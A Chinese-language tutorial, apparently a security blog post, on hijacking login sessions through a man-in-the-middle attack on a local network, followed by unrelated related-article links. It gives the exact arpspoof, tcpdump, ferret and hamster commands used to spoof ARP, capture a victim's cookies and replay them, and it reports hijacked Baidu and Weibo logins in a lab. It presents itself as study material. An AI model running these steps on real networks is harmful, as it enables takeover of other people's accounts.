关于中间人攻击

中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为"中间人"。

因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。

视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws

注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用

关于抓取cookies的手记

要echo下,实现流量的转发,要不目标是上不了网的。

arpspoof 进行arp欺骗

首先抓取包wireshark:选择本地网卡eth0,star抓取流量。

这时候等待用户登录,获取流量信息。获取成功后保存pacp格式。

用ferret加载cookies达到重写流量信息:命令如下:ferret -r chookies.pacp

重写之后生产hamster.txt

这时候运行hamster重放流量,然后代理hettp剩下 的我就不多说了

user。qonze你懂得

0×00

用到的工具是arpspoof tcpdump ferret hamster。

arpspoof 进行ARP欺骗

tcpdump抓去打到本地的数据包

Ferret用来处理抓下来的数据包的

Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。

0×01

拓扑环境:

攻击机:Kali 192.168.1.120

受害机:Windows7 192.168.1.100

网关:192.168.1.1

0×02

我的几个社区帐号都是登录状态,当然未登录也是可以劫持的

先看下我在Kali的机器上是未登录的

0×03

开始arp欺骗

命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

0×04

捕获数据包

命令:tcpdump -i eth0 -w cookie.cap

0×05

模拟受害者登录

受害者在受害机器上就随便刷新一下或者登录一下

完毕

下面我们开始重点

0×06

处理抓去的数据包

ferret -r cookie.cap

自动生成了 hamster.txt

0×07

开启hamster服务

0×08

打开浏览器,使用代理

0×09

打开hamster 浏览器输入http://hamster

选择目标

0x0A

找敏感地址

0x0B

百度劫持成功

微博劫持成功

都成功了

0x0C

我在实验的时候碰见一个问题,就是突然上不到网

下面教大家解决

编辑/etc/NetworkManager/NetworkManager.conf

vi /etc/NetworkManager/NetworkManager.conf

改成true后保存

service network-manager restart

重启服务

中间人攻击之劫持登录会话(cookies)的更多相关文章

  1. 中间人攻击(MITM)姿势总结

    相关学习资料 http://www.cnblogs.com/LittleHann/p/3733469.html http://www.cnblogs.com/LittleHann/p/3738141. ...

  2. 中间人攻击之ettercap嗅探

    中间人攻击: 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的 ...

  3. MTIM(中间人攻击)

    所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情. 信息篡改 当主机A.和主机B通信时,都由主机C来为其“转发”,如图一,而A.B之间并没有真正意思上的直 ...

  4. SSH V2的中间人攻击

    SSH V2的中间人攻击 2012-12-19 10:48:52     我来说两句      作者:Dis9Team 收藏    我要投稿 中间人攻击(Man-in-the-MiddleAttack ...

  5. 中间人攻击 -- Cookie 喷发

    0x00 前言 分享个中间人攻击姿势,屡试不爽. 原本是篇老文,不过写的太啰嗦.今天用简明的文字,重新讲一遍. 0x01 原理 传统 cookie 嗅探,只能获得用户主动访问的站点.不访问就抓不到,效 ...

  6. Android安全之Https中间人攻击漏洞

    Android安全之Https中间人攻击漏洞 0X01 概述   HTTPS,是一种网络安全传输协议,利用SSL/TLS来对数据包进行加密,以提供对网络服务器的身份认证,保护交换数据的隐私与完整性. ...

  7. ARP欺骗与中间人攻击

    前言: 上一篇WPA/WAP2wifi 密码破解笔记说到如何探测附近开放的AP并且破解进入,那么进入别人据局域网我们能干些什么呢?换句话说如果别人进入了我们内部网络,会有什么影响?本文简要介绍了ARP ...

  8. 中间人攻击之arp欺骗 科普ARP欺骗

    中间人攻击之arp欺骗 科普ARP欺骗 A <-> B A中有个ARP Table,每次发包都会在此Table中查找,若找不到,发APR Request包询问.此时若hacker冒充B的M ...

  9. HTTPS中间人攻击实践(原理·实践)

      前言 很早以前看过HTTPS的介绍,并了解过TLS的相关细节,也相信使用HTTPS是相对安全可靠的.直到前段时间在验证https代理通道连接时,搭建了MITM环境,才发现事实并不是我想的那样.由于 ...

随机推荐

  1. js需要清楚的内存模型

    原型 原型重写 原型继承 组合方式实现继承 函数作用域链

  2. Windows x64 栈帧结构

    0x01 前言 Windows 64位下函数调用约定变为了快速调用约定,前4个参数采用rcx.rdx.r8.r9传递,多余的参数从右向左依次使用堆栈传递.本次文章是对于Windows 64位下函数调用 ...

  3. java启动线程时 extends与implements的一个差异

    java extends与implements在使用时的一个差异: Implements: public class ThreadImplementsTest implements Runnable{ ...

  4. 个人多年经典收藏集合(SQL) 推荐大家收藏

    1.SQL经典问题 查找连续日期 2.sqlserver 中charindex/patindex/like 的比较 3.SQL Server 跨服务器查询 4.SQLserver中字符串查找功能pat ...

  5. 登陆oracle数据库时提示“ORA-28002: 7 天之后口令将过期” 或提示 密码过期

    登陆oracle数据库时提示“ORA-28002: 7 天之后口令将过期” 或提示 密码过期. [原因/触发因素] 确定是由于oracle11g中默认在default概要文件中设置了“PASSWORD ...

  6. 二分查找——Python实现

    一.排序思想 二分(折半)查找思想请参见:https://www.cnblogs.com/luomeng/p/10585291.html 二.python实现 def binarySearchDemo ...

  7. java温故而知新(6)深入理解IO Stream

    一.什么是IO Stream Stream 是在编程语言中对输入输出的总称 (一种比喻的称谓.Stream 为流水,输入输出实际上就是指数据的流动,数据由一个地方运动的另一个地方,就像流水一样,程序员 ...

  8. 虚拟机下centos时间不正确的方便解决方法

    就是用NTP了,通过外部的服务同步时间. ntpdate us.pool.ntp.org | logger -t NTP 如果没有ntpdate ,可以使用 yum install ntpdate 进 ...

  9. flask_sqlalchemy filter 和filter_by的区别

    1. filter需要通过类名.属性名的方式,类名.属性名==值.filter_by 直接使用属性名=值,可以看源码filter_by需要传一个 **kwargs 2. filter支持> &l ...

  10. SQL SERVER 2012修改数据库名称(包括 db.mdf 名称的修改)

    假设原来数据库名为db,附加数据库为db.mdf和db_log.ldf.需要改成dbt,及dbt.mdf和dbt_log.ldf. 步骤: .首先把原来的数据库进行备份(选择数据库->右键-&g ...